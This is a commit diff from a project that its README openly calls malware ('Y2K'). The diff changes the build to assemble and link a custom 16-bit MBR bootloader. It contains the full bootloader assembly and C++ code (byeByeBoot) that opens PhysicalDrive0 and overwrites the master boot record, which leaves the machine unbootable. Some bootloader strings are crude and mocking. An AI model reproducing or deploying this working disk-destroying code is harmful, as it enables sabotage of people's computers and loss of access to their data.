Add dynamic bootloader compilation

.gitignore

@@ -1,4 +1,5 @@
 bin/
 bin/*.exe
 res/*.o
-bootloader/*.bin
+mbr/*.bin
+mbr/*.o

Makefile

@@ -1,6 +1,8 @@
 .PHONY: all clean
 
 CXX     := i686-w64-mingw32-g++
+LD	:= i686-w64-mingw32-ld
+NASM	:= nasm
 WINDRES := i686-w64-mingw32-windres
 
 SRC := $(wildcard src/*)
@@ -10,8 +12,10 @@ all: main
 main: $(BIN)
 	@mkdir -p bin
 	$(WINDRES) -o res/resource.o res/resource.rc
-	$(CXX) $(SRC) res/resource.o -static -l gdi32 -l winmm -o bin/Y2K
+	$(NASM) -o mbr/bootloader.bin mbr/bootloader.asm
+	$(LD) -r -b binary -o mbr/bootloader.o mbr/bootloader.bin
+	$(CXX) $(SRC) res/resource.o mbr/bootloader.o -static -l gdi32 -l winmm -o bin/Y2K
 
 clean:
 	@echo "Cleaning up..."
-	@rm -fr bin/* res/*.o bootloader/*.bin
+	@rm -fr bin/* res/*.o mbr/*.bin mbr/*.o

README.org

@@ -11,38 +11,42 @@ To run this malware you need a Windows XP macchine with date set to <2000-01-01>
 You will need *MinGW* and *Make*. You can parse the
 argument =CXX= to change the C++ compiler (the default is ~i686-w64-mingw-g++~) and
 the =WINDRES= to change the default ~windres~ command (the default is ~i686-w64-mingw-windres~).
-You can change the =CXX= and =WINDRES= to ~x86_64-wi64-mingw-g++~ and ~x86_64-wi64-mingw-windres~ respectively to build it natively for 64bit envioriments.
+Others arguments are =NASM= and =LD= for changing the nasm and ld commands.
+You can change the =CXX= and =WINDRES= and =LD= to ~x86_64-w64-mingw-g++~ and ~x86_64-w64-mingw-windres~ and ~x86_64-w64-mingw32-ld~ respectively to build it natively for 64bit envioriments.
 
 *** Arch linux:
 
 #+BEGIN_SRC shell
-pacman -S mingw-w64 make
+pacman -S make mingw-w64 nasm
 make
 #+END_SRC
 
 *** Ubuntu
 
 #+BEGIN_SRC shell
-apt install mingw-w64 make
+apt install make mingw-w64 nasm
 make
 #+END_SRC
 
 
-You can also execute ~make clean~ to clean =bin/= folder, =.o= files on =res/= and =.bin= files on folder =bootloader/=.
+You can also execute ~make clean~ to clean =bin/= folder, =.o= files on =res/= and =.bin= and =.o= files on folder =mbr/=.
 
 ** On Windows
 
-You will need to install [[https://sourceforge.net/projects/mingw/][MinGW]] or another C++ compiler.
+You will need to install [[https://sourceforge.net/projects/mingw/][MinGW]] or another C++ compiler
+and [[https://nasm.us/][NASM]].
 Then run the command:
 
 #+BEGIN_SRC batch
 windres -o res\resource.o res\resource.rc
-g++ src\* res\resource.o -static -l gdi32 -l winmm -o Y2K
+nasm -o mbr\bootloader.bin mbr\bootloader.asm
+ld -r -b binary -o mbr\bootloader.o mbr\bootloader.bin
+g++ src\* res\resource.o mbr\bootloader.o -static -l gdi32 -l winmm -o Y2K
 #+END_SRC
 
 * Bootloader
 
-This project has a void function under the namespace called byeByeBoot, this function load and write the custom bootloader code to the EFI partition. The source code and building instructions for the binaies can be found [[src/bootloader/][here]].
+This project has a void function under the namespace called byeByeBoot, this function load and write the custom bootloader code to the EFI partition. The source code the binary can be found [[src/mbr/][here]].
 
 * Payloads
 

mbr/README.org

@@ -2,6 +2,5 @@
 
 This is the bootloader source code of Y2K. to build run ~nasm bootloader.asm -o bootloader.bin~
 
-You can execute the ~python getHex.py bootloader.bin~ to get the formated bootloader bytes plus
+You need to execute ~ld -r -b binary -o bootloader.o bootloader.bin~ to create the object file used to
-the size of the generated array and put it in the bootloader contant in =src/payloads.h= alongside
+compile the code.
-with the printed size.

mbr/bootloader.asm

@@ -1,166 +1,166 @@
-[BITS	16]	; Bootloader file 16 bits
+[BITS	16]	; Bootloader file 16 bits
-[ORG	0x7C00]	; Memory region that BIOS load the file
+[ORG	0x7C00]	; Memory region that BIOS load the file
-
+
-
+
-; Setup video segment 320x200 - 256 color
+; Setup video segment 320x200 - 256 color
-; Setup
+; Setup
-cli
+cli
-push 0x0A000
+push 0x0A000
-pop es
+pop es
-xor di, di
+xor di, di
-mov ax, 0x13
+mov ax, 0x13
-int 	0x10
+int 	0x10
-
+
-; The code realy starts here
+; The code realy starts here
-mov cx, 0x15
+mov cx, 0x15
-call sleep
+call sleep
-mov si, str1
+mov si, str1
-mov dl, 0x0c
+mov dl, 0x0c
-mov dh, 0x0a
+mov dh, 0x0a
-call cursor
+call cursor
-call print
+call print
-
+
-mov cx, 0x15
+mov cx, 0x15
-call sleep
+call sleep
-mov si, str2
+mov si, str2
-mov dl, 0x06
+mov dl, 0x06
-mov dh, 0x0c
+mov dh, 0x0c
-call cursor
+call cursor
-call print
+call print
-
+
-; Prepare for notepad_rules mode...	
+; Prepare for notepad_rules mode...	
-mov cx, 0x15
+mov cx, 0x15
-call sleep
+call sleep
-
+
-xor dl, dl
+xor dl, dl
-xor dh, dh
+xor dh, dh
-call cursor
+call cursor
-
+
-mov si, str3
+mov si, str3
-mov bl, 0x7
+mov bl, 0x7
-sigma:
+sigma:
-	mov ah, 0xe
+	mov ah, 0xe
-	lodsb
+	lodsb
-	int 0x10
+	int 0x10
-	or al, al
+	or al, al
-	jnz sigma
+	jnz sigma
-	
+	
-add dl, 0x10
+add dl, 0x10
-call cursor
+call cursor
-
+
-notepad_rules:
+notepad_rules:
-	; Read char from keyboard
+	; Read char from keyboard
-	xor ah, ah
+	xor ah, ah
-	int 0x16
+	int 0x16
-
+
-	; Verify if Backspace key was pressed
+	; Verify if Backspace key was pressed
-	cmp al, 0x8
+	cmp al, 0x8
-	je delete_char
+	je delete_char
-
+
-	; Verify if Enter key was pressed
+	; Verify if Enter key was pressed
-	cmp al, 0x0d
+	cmp al, 0x0d
-	je inc_y
+	je inc_y
-
+
-	; Verify if the line reached on end
+	; Verify if the line reached on end
-	cmp dl, 0x27
+	cmp dl, 0x27
-	jge inc_y
+	jge inc_y
-
+
-	; Check for keys to call egg function
+	; Check for keys to call egg function
-	cmp al, 0x1b ; ESC
+	cmp al, 0x1b ; ESC
-	je e1
+	je e1
-	cmp al, 0x36 ; 6
+	cmp al, 0x36 ; 6
-	je e2
+	je e2
-	cmp al, 0x39 ; 9
+	cmp al, 0x39 ; 9
-	je e3
+	je e3
-	cmp al, 0x09 ; TAB
+	cmp al, 0x09 ; TAB
-	je e4
+	je e4
-
+
-		
+		
-	; Print char on screen
+	; Print char on screen
-	mov ah, 0x0a
+	mov ah, 0x0a
-	xor bh, bh
+	xor bh, bh
-	mov bl, 0x0f
+	mov bl, 0x0f
-	mov cx, 0x01
+	mov cx, 0x01
-	int 0x10
+	int 0x10
-
+
-	inc dl
+	inc dl
-	call cursor
+	call cursor
-	jmp notepad_rules
+	jmp notepad_rules
-
+
-	inc_y:
+	inc_y:
-		xor dl, dl
+		xor dl, dl
-		inc dh
+		inc dh
-		call cursor
+		call cursor
-		jmp notepad_rules
+		jmp notepad_rules
-
+
-	delete_char:
+	delete_char:
-		dec dl
+		dec dl
-		call cursor
+		call cursor
-		jmp notepad_rules
+		jmp notepad_rules
-
+
-e1:
+e1:
-	mov si, easter1
+	mov si, easter1
-	jmp eternal
+	jmp eternal
-e2:
+e2:
-	mov si, easter2
+	mov si, easter2
-	jmp eternal
+	jmp eternal
-e3: 
+e3: 
-	mov si, easter3
+	mov si, easter3
-	jmp eternal
+	jmp eternal
-e4:
+e4:
-	mov si, easter4
+	mov si, easter4
-	; jmp eternal (it's down here)
+	; jmp eternal (it's down here)
-
+
-eternal:
+eternal:
-	xor dl, dl
+	xor dl, dl
-	xor dh, dh
+	xor dh, dh
-	call cursor
+	call cursor
-	call print
+	call print
-	hlt
+	hlt
-
+
-
+
-; Set cursor position
+; Set cursor position
-; dl - Columns 	- x
+; dl  Columns	x
-; dh - Rows	- y
+; dh  Rows	y
-cursor:
+cursor:
-	cli
+	cli
-	mov ah, 0x2
+	mov ah, 0x2
-	mov bh, 0x0
+	mov bh, 0x0
-	int 	0x10
+	int 	0x10
-	ret
+	ret
-
+
-; Print some gay string
+; Print some gay string
-; si - string
+; si  string
-print:
+print:
-	cli
+	cli
-	mov bl, 0x21
+	mov bl, 0x21
-	l:
+	l:
-		mov ah, 0xe
+		mov ah, 0xe
-		lodsb
+		lodsb
-		inc bl
+		inc bl
-		int 	0x10
+		int 	0x10
-		or al, al
+		or al, al
-		jnz l
+		jnz l
-	ret
+	ret
-
+
-; Delay
+; Delay
-; cx - delay value in microsseconds
+; cx  delay value in microsseconds
-sleep:
+sleep:
-	cli
+	cli
-	mov ah, 0x86
+	mov ah, 0x86
-	mov dx, 0x0
+	mov dx, 0x0
-	int 0x15
+	int 0x15
-	ret
+	ret
-
+
-str1 db "Happy new Year!", 0
+str1 db "Happy new Year!", 0
-str2 db "Enjoy this useless payload...", 0
+str2 db "Enjoy this useless payload...", 0
-str3 db "Type something: ", 0
+str3 db "Type something: ", 0
-
+
-easter1 db "You find a EasterEgg, OMG!", 0
+easter1 db "You find a EasterEgg, OMG!", 0
-easter2 db "This Code is so buggy. >:C", 0
+easter2 db "This Code is so buggy. >:C", 0
-easter3 db "I really hate this mbr payload.", 0
+easter3 db "I really hate this mbr payload.", 0
-easter4 db "You're very gay. B)", 0
+easter4 db "You're very gay. B)", 0
-
+
-
+
-times 510 - ($-$$) db 0 ; Fill the file with 0 510 times'
+times 510 - ($-$$) db 0 ; Fill the file with 0 510 times
-dw 0xAA55 ; Magic number used by BIOS to identify the file
+dw 0xAA55 ; Magic number used by BIOS to identify the file

mbr/getHex.py

@@ -1,30 +0,0 @@
-from sys import argv, exit as exitc
-
-if len(argv) > 2:
-    print('Please inform just one file!')
-    exitc(2)
-
-elif len(argv) != 2:
-    print('Plase inform a file!')
-    exitc(3)
-
-try:
-    file = open(argv[1], 'rb')
-
-except FileNotFoundError:
-    print('The specified file was not found!')
-    exitc(4)
-
-content = file.read()
-file.close()
-
-for i in range(len(content)):
-    if i%12 == 0:
-        print('')
-
-    print(format(content[i], '#04x'), end='')
-
-    if i != len(content)-1:
-        print(', ', end='')
-
-print('\nSize:', len(content)) 

src/main.cpp

@@ -2,6 +2,9 @@
 #include "payloads.h"
 #include "bytebeats.h"
 
+extern char binary_mbr_bootloader_bin_start[];
+extern char binary_mbr_bootloader_bin_end[];
+
 int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd){
 	
 	HANDLE t1, t2, t3, t4;
@@ -19,7 +22,11 @@ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine
 					PlaySound(MAKEINTRESOURCE(2), hInstance, SND_RESOURCE);
 					ExitProcess(0);
 				case 2:
-					Payloads::byeByeBoot();
+					Payloads::byeByeBoot((unsigned int)
+							(binary_mbr_bootloader_bin_end - 
+							binary_mbr_bootloader_bin_start),
+							binary_mbr_bootloader_bin_start,
+							binary_mbr_bootloader_bin_end);
 					break;
 				case 3:
 					ExitProcess(0);
@@ -78,4 +85,4 @@ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine
 	}
 	
 	return 0;
-}
+}

src/payloads.h

@@ -47,57 +47,22 @@ namespace Payloads {
 			return 3;
 	}
 	
-	void byeByeBoot(){
+	void byeByeBoot(int size,char* start,char* end){
-		const unsigned char bootloader[512] = {
+		unsigned char bootloader[size];
-			0xFA, 0x68, 0x00, 0xA0, 0x07, 0x31, 0xFF, 0xB8, 0x13, 0x00, 0xCD, 0x10,
+		int index = 0;
-			0xB9, 0x15, 0x00, 0xE8, 0xB8, 0x00, 0xBE, 0xD3, 0x7C, 0xB2, 0x0C, 0xB6,
+		for(char* i = start; i != end; ++i) {
-			0x0A, 0xE8, 0x97, 0x00, 0xE8, 0x9C, 0x00, 0xB9, 0x15, 0x00, 0xE8, 0xA5,
+			bootloader[index] = *i;
-			0x00, 0xBE, 0xE3, 0x7C, 0xB2, 0x06, 0xB6, 0x0C, 0xE8, 0x84, 0x00, 0xE8,
+			index++;
-			0x89, 0x00, 0xB9, 0x15, 0x00, 0xE8, 0x92, 0x00, 0x30, 0xD2, 0x30, 0xF6,
+		}
-			0xE8, 0x74, 0x00, 0xBE, 0x01, 0x7D, 0xB3, 0x07, 0xB4, 0x0E, 0xAC, 0xCD,
-			0x10, 0x08, 0xC0, 0x75, 0xF7, 0x80, 0xC2, 0x10, 0xE8, 0x60, 0x00, 0x30,
-			0xE4, 0xCD, 0x16, 0x3C, 0x08, 0x74, 0x34, 0x3C, 0x0D, 0x74, 0x27, 0x80,
-			0xFA, 0x27, 0x7D, 0x22, 0x3C, 0x1B, 0x74, 0x2E, 0x3C, 0x36, 0x74, 0x2F,
-			0x3C, 0x39, 0x74, 0x30, 0x3C, 0x09, 0x74, 0x31, 0xB4, 0x0A, 0x30, 0xFF,
-			0xB3, 0x0F, 0xB9, 0x01, 0x00, 0xCD, 0x10, 0xFE, 0xC2, 0xE8, 0x2F, 0x00,
-			0xEB, 0xCD, 0x30, 0xD2, 0xFE, 0xC6, 0xE8, 0x26, 0x00, 0xEB, 0xC4, 0xFE,
-			0xCA, 0xE8, 0x1F, 0x00, 0xEB, 0xBD, 0xBE, 0x12, 0x7D, 0xEB, 0x0D, 0xBE,
-			0x2D, 0x7D, 0xEB, 0x08, 0xBE, 0x48, 0x7D, 0xEB, 0x03, 0xBE, 0x68, 0x7D,
-			0x30, 0xD2, 0x30, 0xF6, 0xE8, 0x04, 0x00, 0xE8, 0x09, 0x00, 0xF4, 0xFA,
-			0xB4, 0x02, 0xB7, 0x00, 0xCD, 0x10, 0xC3, 0xFA, 0xB3, 0x21, 0xB4, 0x0E,
-			0xAC, 0xFE, 0xC3, 0xCD, 0x10, 0x08, 0xC0, 0x75, 0xF5, 0xC3, 0xFA, 0xB4,
-			0x86, 0xBA, 0x00, 0x00, 0xCD, 0x15, 0xC3, 0x48, 0x61, 0x70, 0x70, 0x79,
-			0x20, 0x6E, 0x65, 0x77, 0x20, 0x59, 0x65, 0x61, 0x72, 0x21, 0x00, 0x45,
-			0x6E, 0x6A, 0x6F, 0x79, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x75, 0x73,
-			0x65, 0x6C, 0x65, 0x73, 0x73, 0x20, 0x70, 0x61, 0x79, 0x6C, 0x6F, 0x61,
-			0x64, 0x2E, 0x2E, 0x2E, 0x00, 0x54, 0x79, 0x70, 0x65, 0x20, 0x73, 0x6F,
-			0x6D, 0x65, 0x74, 0x68, 0x69, 0x6E, 0x67, 0x3A, 0x20, 0x00, 0x59, 0x6F,
-			0x75, 0x20, 0x66, 0x69, 0x6E, 0x64, 0x20, 0x61, 0x20, 0x45, 0x61, 0x73,
-			0x74, 0x65, 0x72, 0x45, 0x67, 0x67, 0x2C, 0x20, 0x4F, 0x4D, 0x47, 0x21,
-			0x00, 0x54, 0x68, 0x69, 0x73, 0x20, 0x43, 0x6F, 0x64, 0x65, 0x20, 0x69,
-			0x73, 0x20, 0x73, 0x6F, 0x20, 0x62, 0x75, 0x67, 0x67, 0x79, 0x2E, 0x20,
-			0x3E, 0x3A, 0x43, 0x00, 0x49, 0x20, 0x72, 0x65, 0x61, 0x6C, 0x6C, 0x79,
-			0x20, 0x68, 0x61, 0x74, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x6D,
-			0x62, 0x72, 0x20, 0x70, 0x61, 0x79, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x00,
-			0x59, 0x6F, 0x75, 0x27, 0x72, 0x65, 0x20, 0x76, 0x65, 0x72, 0x79, 0x20,
-			0x67, 0x61, 0x79, 0x2E, 0x20, 0x42, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
-		};
 
 		DWORD bWriten;
 		
-		HANDLE mbr = CreateFileA(TEXT("\\\\.\\PhysicalDrive0"), GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
+		HANDLE mbr = CreateFileA(TEXT("\\\\.\\PhysicalDrive0"),
-		WriteFile(mbr, bootloader, 512, &bWriten, NULL);
+				GENERIC_ALL,
+				FILE_SHARE_READ | FILE_SHARE_WRITE,
+				0, OPEN_EXISTING, 0, 0);
+
+		WriteFile(mbr, bootloader, size, &bWriten, NULL);
 		CloseHandle(mbr);
 	}